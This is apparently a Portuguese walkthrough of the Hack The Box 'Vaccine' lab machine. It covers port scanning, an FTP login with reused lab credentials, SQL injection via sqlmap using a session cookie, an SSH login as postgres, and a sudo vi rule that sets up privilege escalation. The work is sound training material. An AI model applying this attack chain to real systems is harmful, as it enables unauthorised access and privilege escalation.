# nmap -sC -sV -v -Pn 10.10.10.46 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 13:59 EDT
............................
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_ 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Temos aqui um linux com portas 21,22 e 80 abertas.
Ao acessar http://10.10.10.46, temos uma tela de login:
Vamos rodar uma varredura de diretórios neste servidor web com gobuster:
Aparentemente o servidor não tem nenhuma vulnerabilidade aparente. Vamos partir para outras possibilidades.
Exploração
No laboratório passado (máquina Oopsie), encontamos credenciais de acesso ftp:
user: ftpuser
pass: mc@F1l3ZilL4
Vamos então conectar no ftp do servidor usando as credenciais acima:
# ftp 10.10.10.46 1 ⨯
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:vergani): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Vamos fazer download do arquivo backup.zip
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00 secs (20.2996 MB/s)
Ao tentar descompactar o arquivo, ele pede senha!!!
Vamos novamente acessar o dashborad http://10.10.10.46/ e logar com as credenciais encontradas:
Vamos agora tentar alguma técnica de SQL Injection. Se digitarmos, por exemplo, a letra "a" no campo de busca, a URL via ficar da seguinte forma http://10.10.10.46/dashboard.php?search=a
Se repetirmos o teste acima, mas desta vez inspecionando os elementos via browser, vamos ver que o nosso cokkie de sessão logada é:
Cookie: PHPSESSID=5ko3ado4ett9ac6cmeu2qrj79s
Vamos então juntar todas as informações e usar com o sqlmap:
Vamos conectar via ssh diretamente no host 46 com as credenciais encontradas:
# ssh postgres@10.10.10.46 255 ⨯
The authenticity of host '10.10.10.46 (10.10.10.46)' can't be established.
ECDSA key fingerprint is SHA256:eVsQ4RXbKR9eOZaXSlMmyuKTDOQ39NAb4vD+GOegBvk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.46' (ECDSA) to the list of known hosts.
postgres@10.10.10.46's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-29-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 22 Sep 2021 02:50:23 PM UTC
System load: 0.38 Processes: 190
Usage of /: 32.0% of 19.56GB Users logged in: 0
Memory usage: 17% IP address for ens160: 10.10.10.46
Swap usage: 0%
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
postgres@vaccine:~$
Agora que temos uma senha válido do linux, podemos usá-la para verificar se existe alguma aplicação que possamos executar com permissões de root:
postgres@vaccine:/home/simon$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
Podemos rodar o /bin/vi com permissões de superusuário. Vamos rodar examente o comando acima: